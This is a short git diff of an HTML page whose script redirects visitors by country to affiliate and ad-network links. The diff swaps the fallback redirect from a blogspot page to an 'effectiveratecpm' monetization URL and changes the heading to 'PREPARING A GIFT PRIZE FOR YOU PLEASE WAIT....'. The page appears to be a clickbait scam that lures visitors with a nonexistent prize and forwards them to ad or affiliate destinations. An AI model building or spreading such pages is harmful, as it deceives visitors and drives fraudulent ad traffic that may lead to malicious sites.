--- a/index.html
+++ b/index.html
@@ -23,12 +23,12 @@
             } else if (country === "GB") {
                 window.location.href = "https://conilladvertising.o18a.com/c?o=21477432&m=23984&a=642610";
             } else { 
-                window.location.href = "https://livesportsworld2025.blogspot.com/?m=1"; 
+                window.location.href = "https://www.effectiveratecpm.com/ws2xtkcgv?key=6d6743f26a64123b15c5e279a2f6226a"; 
             }
         });
     </script>
 </head>
 <body>
-    <h1>PREPARING A GIFT FOR YOU PLEASE WAIT....</h1>
+    <h1>PREPARING A GIFT PRIZE FOR YOU PLEASE WAIT....</h1>
 </body>
 </html>
